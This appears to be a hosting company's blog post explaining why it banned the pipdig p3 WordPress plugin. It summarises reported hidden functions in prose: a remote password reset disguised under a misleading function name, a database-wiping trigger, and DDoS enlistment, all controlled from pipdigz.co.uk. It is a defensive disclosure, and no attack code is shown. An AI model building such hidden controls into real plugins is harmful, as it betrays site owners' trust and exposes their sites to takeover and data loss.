We spend every April 1st playing jokes on each other that rely on comical hoaxes and abuse our trust, but make us giggle during this annual tradition. We know these fantastical stories are most likely false and intended to entertain. Stories like T Mobile’s Phone BoothE, Nissin’s Cup o Noodles headphones, or Auntie Anne’s Hot Yoga Classes, all strike a nice chord of absurdist humor and harmless prank.
There was another story in headlines about abusing trust which appears was not a hoax and far from harmless. In the days prior to April Fools day this year it was reported by multiple parties that the p3 plugin (a premium plugin by pipdig) included multiple sections of code which for all purposes appeared to be high risk or intentionally malicious.
The details of the reportedly malicious code found in the plugin have been covered by two reporting parties here and here.
The TL;DR for what the plugin was doing based on the above reports was:
1) The plugin allowed whoever controls “pipdigz.co.uk” to change your WordPress user account passwords to the string “p3_safe_styles”, as long as they knew the email address associated with the account.
2) The function name for the code that changed passwords was hidden in a function named “p3_check_social_links()”, even though the only thing the “p3_check_social_links()” function did was call “wp_set_password()”. Which appears to be an attempt to obfuscate the intention of their code.
3) The code would delete all database tables associated with the site IF your website’s domain name was found on a page hosted on “pipdigz.co.uk”.
4) The sites utilizing the plugin could be used as part of a Distributed Denial of Service network, targeting URL(s) found on a page hosted on “pipdigz.co.uk”.
The author of the p3 plugin, pipdig, has issued a rebuttal citing that the code had a valid purpose and was not being used how the reporting parties have claimed. It isn’t certain they ever abused this level of access, but the code cannot lie and we confirmed the code was allowing whoever controlled pipdigz.co.uk to take the above actions and we believe that is a higher level of trust than was implied when people installed this plugin.
Pagely staff have already reached out to our customers running the p3 plugin and confirmed the reportedly malicious code did, in fact, exist on their sites. Pagely’s security team discussed with our customers running the P3 plugin what risks this plugin added to their site, and we confirmed the reported malicious code worked as explained in the above reports by independently verifying the code existed and could be used in this manner. With the independent confirmation that these high-security risk bits of code existed in the plugin and our staff’s help clarifying points, our customers agreed they did not wish to continue running this plugin on their sites.
Trust is a commitment and must be earned. Due to the high-risk code that was introduced in the p3 plugin, Pagely’s staff has decided to add this plugin to the Pagely banned plugin list. Plugins on the banned plugin list are not allowed on our network and are auto-disabled if detected. Most of the banned plugins on this list are there due to conflicts with existing services (cache or backups), and many are there due to risk to the site if they are installed.
The P3 plugins by pipdig is not the first plugin the Pagely team has banned for high-risk code, but it’s the first we believe was related to distrust by the author who is still actively developing for the plugin. We hope it will be the first to be unbanned once the author is able to redeem themselves. We would hope that in the future the author of the p3 plugin show everyone they can be trusted to provide code safe to run on websites. We are aware pipdig has already removed much of the reported malicious code in their most recent release. Removing the high-risk code is a great first step, on the road to regaining their trust. I look forward to watching pipdig continue their momentum to show that they are committed to their users and are worthy to be trusted to install code on your sites. In the meantime, our duty is to protect our customers and our servers and this plugin will remain banned until trust has been restored.
This whole debacle is a reminder of how much trust site owners put into the developers of plugin and designers of themes you have installed on your WordPress site. Many themes and plugins are freely available from WP.org, but they still require your attention and care, plugins have been abused in the past and we have reported about such abuses like when an author hands off their plugin to a malicious developer (without knowing that the new developer had nefarious intentions). The incident with P3 Plugin is another problem along the same lines, the loss of trust with the plugin developer. If you’re a site owner and your site’s plugins have always been safe and secure, maybe it’s time to send out some thank you emails, for all the developers who have given you not only a useful tool on your site but also not abused your trust. It’s always best knowing you’ve put your trust in the right hands, and it makes April fools day a lot more enjoyable.
Did you see Elon Musk released an auto-tuned rap single RIP Harambe? That wasn’t an April fools joke … sometimes hoaxes are best left as hoaxes, we trusted you Elon!